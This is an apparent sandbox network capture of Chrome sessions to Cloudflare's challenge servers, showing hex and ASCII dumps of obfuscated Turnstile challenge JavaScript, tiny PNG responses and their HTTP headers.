                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65
                                                                                                                                                                                                                                                Data Ascii: ,"turnstile_timeout":"Timed%20out","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_verifying":"Verifying...","turnstile_refresh":"Refresh","turnstile
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 69 66 74 28 29 29 7d 7d 28 61 2c 36 35 34 32 38 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 33 38 39 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 48 4c 43 55 47 27 3a 67 4a 28 36 31 32 29 2c 27 7a 59 55 6f 75 27 3a 67 4a 28 31 32 35 36 29 2c 27 43 61 79 56 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 5a 68 72 66 46 27 3a 67 4a 28 31 31 35 36 29 2c 27 41 61 5a 73 67 27 3a 67 4a 28 31 35 38 37 29 2c 27 53 4d 65 43 4d 27 3a 67 4a 28 31 32 30 34 29 2c 27 45 46 42 56 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 62 70 6d 42 63 27 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                Data Ascii: ift())}}(a,654283),eM=this||self,eN=eM[gI(389)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'HLCUG':gJ(612),'zYUou':gJ(1256),'CayVd':function(h,i){return h==i},'ZhrfF':gJ(1156),'AaZsg':gJ(1587),'SMeCM':gJ(1204),'EFBVQ':function(h,i){return h>i},'bpmBc':functi
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 6e 28 69 2c 6a 2c 6f 2c 67 4c 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 67 4c 3d 67 4a 2c 64 5b 67 4c 28 31 32 38 32 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 67 4c 28 31 34 39 38 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 67 4c 28 31 32 36 34 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 36 33 33 29 5d 5b 67 4c 28 33 34 35 29 5d 5b 67 4c 28 31 30 30 31 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 36 33 33 29 5d 5b 67 4c 28 33 34 35
                                                                                                                                                                                                                                                Data Ascii: n(i,j,o,gL,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(gL=gJ,d[gL(1282)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[gL(1498)];J+=1)if(K=i[gL(1264)](J),Object[gL(1633)][gL(345)][gL(1001)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[gL(1633)][gL(345
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 32 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 31 36 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4c 28 38 30 32 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 67 4c 28 34 35 37 29 5d 28 64 5b 67 4c 28 37 37 37 29 5d 28 48 2c 31 29 2c 64 5b 67 4c 28 37 35 37 29 5d 28 4d 2c 31 29 29 2c 64 5b 67 4c 28 31 32 38 32 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 31 36 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 4d 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4c 28 31 36 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d
                                                                                                                                                                                                                                                Data Ascii: 2)](I,j-1)?(I=0,G[gL(1654)](o(H)),H=0):I++,s++);for(M=C[gL(802)](0),s=0;8>s;H=d[gL(457)](d[gL(777)](H,1),d[gL(757)](M,1)),d[gL(1282)](I,j-1)?(I=0,G[gL(1654)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=H<<1|M,j-1==I?(I=0,G[gL(1654)](o(H)),H=0):I++,M
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 28 33 2c 46 29 3b 78 5b 46 5d 3d 46 2c 46 2b 3d 31 29 3b 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 67 50 28 36 38 31 29 5d 28 32 2c 32 29 2c 47 3d 31 3b 47 21 3d 4c 3b 29 69 66 28 67 50 28 39 32 32 29 3d 3d 3d 67 50 28 31 34 38 36 29 29 72 65 74 75 72 6e 20 53 3d 73 5b 67 50 28 32 36 35 29 5d 28 65 2c 73 5b 67 50 28 37 30 37 29 5d 29 2c 78 3d 42 5b 67 50 28 31 32 32 38 29 5d 28 67 50 28 31 36 32 31 29 29 2c 43 5b 67 50 28 31 30 37 37 29 5d 3d 67 50 28 32 37 37 29 2c 44 5b 67 50 28 31 31 39 32 29 5d 5b 67 50 28 36 39 30 29 5d 3d 73 5b 67 50 28 31 34 34 36 29 5d 2c 45 5b 67 50 28 34 31 35 29 5d 3d 67 50 28 32 34 39 29 2c 46 5b 67 50 28 31 31 32 30 29 5d 28 67 50 28 39 35 31 29 2c 67 50 28 31 33 38 37 29 29 2c 54 3d 47 5b 67 50 28 31 32 32 38 29 5d 28 73
                                                                                                                                                                                                                                                Data Ascii: (3,F);x[F]=F,F+=1);for(K=0,L=Math[gP(681)](2,2),G=1;G!=L;)if(gP(922)===gP(1486))return S=s[gP(265)](e,s[gP(707)]),x=B[gP(1228)](gP(1621)),C[gP(1077)]=gP(277),D[gP(1192)][gP(690)]=s[gP(1446)],E[gP(415)]=gP(249),F[gP(1120)](gP(951),gP(1387)),T=G[gP(1228)](s
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 4e 3d 64 5b 67 50 28 31 36 30 31 29 5d 28 43 2c 31 29 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 67 50 28 36 38 31 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4d 3d 49 26 48 2c 49 3e 3e 3d 31 2c 30 3d 3d 49 26 26 28 49 3d 6a 2c 48 3d 64 5b 67 50 28 31 35 35 31 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 67 50 28 38 38 36 29 5d 28 64 5b 67 50 28 31 31 34 36 29 5d 28 30 2c 4d 29 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 64 5b 67 50 28 31 35 35 31 29 5d 28 65 2c 4b 29 2c 4e 3d 64 5b 67 50 28 33 36 37 29 5d 28 43 2c 31 29 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 45 5b 67 50 28 31 32 38 33 29 5d 28 27 27 29 7d 69 66 28 42 3d 3d 30 26
                                                                                                                                                                                                                                                Data Ascii: N=d[gP(1601)](C,1),B--;break;case 1:for(K=0,L=Math[gP(681)](2,16),G=1;G!=L;M=I&H,I>>=1,0==I&&(I=j,H=d[gP(1551)](o,J++)),K|=d[gP(886)](d[gP(1146)](0,M)?1:0,G),G<<=1);x[C++]=d[gP(1551)](e,K),N=d[gP(367)](C,1),B--;break;case 2:return E[gP(1283)]('')}if(B==0&
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 39 30 38 29 5d 5b 67 53 28 31 30 32 36 29 5d 2c 6f 3d 7b 7d 2c 6f 5b 67 53 28 33 30 31 29 5d 3d 65 4d 5b 67 53 28 39 30 38 29 5d 5b 67 53 28 33 30 31 29 5d 2c 6f 5b 67 53 28 36 38 37 29 5d 3d 65 4d 5b 67 53 28 39 30 38 29 5d 5b 67 53 28 36 38 37 29 5d 2c 6f 5b 67 53 28 36 33 31 29 5d 3d 65 4d 5b 67 53 28 39 30 38 29 5d 5b 67 53 28 36 33 31 29 5d 2c 73 3d 6f 2c 78 3d 6e 65 77 20 65 4d 5b 28 67 53 28 37 39 38 29 29 5d 28 29 2c 21 78 29 72 65 74 75 72 6e 3b 42 3d 6b 5b 67 53 28 39 33 35 29 5d 2c 78 5b 67 53 28 34 39 38 29 5d 28 42 2c 6e 2c 21 21 5b 5d 29 2c 78 5b 67 53 28 39 36 32 29 5d 3d 32 35 30 30 2c 78 5b 67 53 28 33 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 78 5b 67 53 28 31 35 36 32 29 5d 28 67 53 28 39 31 36 29 2c 67 53 28 34 37 39 29 29
                                                                                                                                                                                                                                                Data Ascii: 908)][gS(1026)],o={},o[gS(301)]=eM[gS(908)][gS(301)],o[gS(687)]=eM[gS(908)][gS(687)],o[gS(631)]=eM[gS(908)][gS(631)],s=o,x=new eM[(gS(798))](),!x)return;B=k[gS(935)],x[gS(498)](B,n,!![]),x[gS(962)]=2500,x[gS(330)]=function(){},x[gS(1562)](gS(916),gS(479))
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 28 31 36 33 30 29 5d 28 50 2c 27 2a 27 29 29 7d 2c 31 35 30 30 29 2c 21 5b 5d 3b 65 6c 73 65 20 6b 3d 5b 68 5b 67 54 28 33 33 33 29 5d 2b 63 2c 67 54 28 34 38 39 29 2b 64 2c 68 5b 67 54 28 37 32 34 29 5d 28 68 5b 67 54 28 33 39 34 29 5d 2c 65 29 2c 67 54 28 31 32 31 38 29 2b 66 2c 67 54 28 31 32 35 34 29 2b 4a 53 4f 4e 5b 67 54 28 31 33 34 39 29 5d 28 67 29 5d 5b 67 54 28 31 32 38 33 29 5d 28 67 54 28 31 34 31 33 29 29 2c 65 4d 5b 67 54 28 31 36 39 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 57 29 7b 67 57 3d 67 54 2c 65 4d 5b 67 57 28 31 32 33 37 29 5d 28 6b 2c 75 6e 64 65 66 69 6e 65 64 2c 67 57 28 39 33 32 29 29 7d 2c 31 30 29 2c 65 4d 5b 67 54 28 31 36 39 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 58 29 7b 67 58 3d 67 54 2c 67 58 28 31 34 31 39 29 21 3d
                                                                                                                                                                                                                                                Data Ascii: (1630)](P,'*'))},1500),![];else k=[h[gT(333)]+c,gT(489)+d,h[gT(724)](h[gT(394)],e),gT(1218)+f,gT(1254)+JSON[gT(1349)](g)][gT(1283)](gT(1413)),eM[gT(1699)](function(gW){gW=gT,eM[gW(1237)](k,undefined,gW(932))},10),eM[gT(1699)](function(gX){gX=gT,gX(1419)!=
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1369INData Raw: 31 37 29 5d 3d 65 58 2c 66 53 5b 67 49 28 36 38 34 29 5d 3d 66 6b 2c 66 53 5b 67 49 28 31 35 31 36 29 5d 3d 66 6c 2c 66 53 5b 67 49 28 34 34 37 29 5d 3d 66 76 2c 66 53 5b 67 49 28 31 34 39 33 29 5d 3d 66 75 2c 66 53 5b 67 49 28 31 30 33 33 29 5d 3d 66 74 2c 66 53 5b 67 49 28 32 38 31 29 5d 3d 66 73 2c 66 53 5b 67 49 28 31 33 37 32 29 5d 3d 66 64 2c 66 53 5b 67 49 28 31 32 35 32 29 5d 3d 66 52 2c 66 53 5b 67 49 28 31 35 32 30 29 5d 3d 66 65 2c 66 53 5b 67 49 28 39 36 30 29 5d 3d 66 69 2c 66 53 5b 67 49 28 39 34 35 29 5d 3d 66 66 2c 66 53 5b 67 49 28 31 34 32 38 29 5d 3d 66 61 2c 66 53 5b 67 49 28 35 30 31 29 5d 3d 66 39 2c 65 4d 5b 67 49 28 39 36 35 29 5d 3d 66 53 2c 66 54 3d 7b 7d 2c 66 54 5b 67 49 28 31 35 30 36 29 5d 3d 27 6f 27 2c 66 54 5b 67 49 28 31
                                                                                                                                                                                                                                                Data Ascii: 17)]=eX,fS[gI(684)]=fk,fS[gI(1516)]=fl,fS[gI(447)]=fv,fS[gI(1493)]=fu,fS[gI(1033)]=ft,fS[gI(281)]=fs,fS[gI(1372)]=fd,fS[gI(1252)]=fR,fS[gI(1520)]=fe,fS[gI(960)]=fi,fS[gI(945)]=ff,fS[gI(1428)]=fa,fS[gI(501)]=f9,eM[gI(965)]=fS,fT={},fT[gI(1506)]='o',fT[gI(1


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.649741104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC796OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:27 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8294ee02c35b-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.649746104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:28 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:28 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:28 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8298aebf0ce9-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.649747104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:29 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 126857
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd829e7e3a8c5d-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c
                                                                                                                                                                                                                                                Data Ascii: our%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_failure":"Error","turnstile_footer_terms":"Terms","turnstil
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 32 31 39 35 33 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 37 38 35 29 5d 2c 65 4f 3d 7b 7d 2c 65 4f 5b 67 49 28 35 32 30 29 5d 3d 27 6f 27 2c 65 4f 5b 67 49 28 39 31 37 29 5d 3d 27 73 27 2c 65 4f 5b 67 49 28 33 31 39 29 5d 3d 27 75 27 2c 65 4f 5b 67 49 28 31 35 38 32 29 5d 3d 27 7a 27 2c 65 4f 5b 67 49 28 31 37 32 33 29 5d 3d 27 6e 27 2c 65 4f 5b 67 49 28 31 34 33 38 29 5d 3d 27 49 27 2c 65 50 3d 65 4f 2c 65 4d 5b 67 49 28 31 31 32 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 67 4e 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 67 4e 3d 67 49 2c 6f 3d 7b 27 6c 4a 4a 4b 42 27 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                Data Ascii: }catch(g){e.push(e.shift())}}(a,219532),eM=this||self,eN=eM[gI(785)],eO={},eO[gI(520)]='o',eO[gI(917)]='s',eO[gI(319)]='u',eO[gI(1582)]='z',eO[gI(1723)]='n',eO[gI(1438)]='I',eP=eO,eM[gI(1121)]=function(g,h,i,j,gN,o,x,B,C,D,E,F){if(gN=gI,o={'lJJKB':functio
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 2c 68 2c 67 50 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 50 3d 67 49 2c 69 3d 7b 27 43 57 72 6d 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 65 74 77 47 73 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 5a 74 65 44 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 67 50 28 34 30 30 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 67 50 28 31 34 37 34 29 5d 28 6b 2c 6a 5b 67 50 28 31 38 32 36 29 5d 29 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 6c 3d 3d 3d 27 66 27 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 69 5b 67 50 28 31 34 37 34 29 5d 28 6d 2c 68 5b 6a 5b 6b 5d 5d 5b 67 50
                                                                                                                                                                                                                                                Data Ascii: ,h,gP,i,j,k,l,m){for(gP=gI,i={'CWrmF':function(n,o){return n+o},'etwGs':function(n,o){return n<o},'ZteDg':function(n,o){return n(o)}},j=Object[gP(400)](h),k=0;i[gP(1474)](k,j[gP(1826)]);k++)if(l=j[k],l==='f'&&(l='N'),g[l]){for(m=0;i[gP(1474)](m,h[j[k]][gP
                                                                                                                                                                                                                                                2024-10-03 14:09:29 UTC1369INData Raw: 67 54 28 39 34 37 29 5d 2b 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 34 36 36 29 5d 2b 27 2f 27 2c 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 31 38 31 35 29 5d 29 2b 27 2f 27 2b 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 31 32 38 34 29 5d 2c 6f 3d 7b 7d 2c 6f 5b 67 54 28 33 33 38 29 5d 3d 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 33 33 38 29 5d 2c 6f 5b 67 54 28 31 35 36 36 29 5d 3d 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 31 35 36 36 29 5d 2c 6f 5b 67 54 28 38 31 32 29 5d 3d 65 4d 5b 67 54 28 39 38 38 29 5d 5b 67 54 28 38 31 32 29 5d 2c 73 3d 6f 2c 78 3d 6e 65 77 20 65 4d 5b 28 67 54 28 31 30 33 30 29 29 5d 28 29 2c 21 78 29 72 65 74 75 72 6e 3b 42 3d 6b 5b 67 54 28 31 37 31 39 29 5d 2c 78 5b 67 54 28 33 38 31 29 5d 28 42 2c 6e 2c 21 21 5b
                                                                                                                                                                                                                                                Data Ascii: gT(947)]+eM[gT(988)][gT(466)]+'/',eM[gT(988)][gT(1815)])+'/'+eM[gT(988)][gT(1284)],o={},o[gT(338)]=eM[gT(988)][gT(338)],o[gT(1566)]=eM[gT(988)][gT(1566)],o[gT(812)]=eM[gT(988)][gT(812)],s=o,x=new eM[(gT(1030))](),!x)return;B=k[gT(1719)],x[gT(381)](B,n,!![
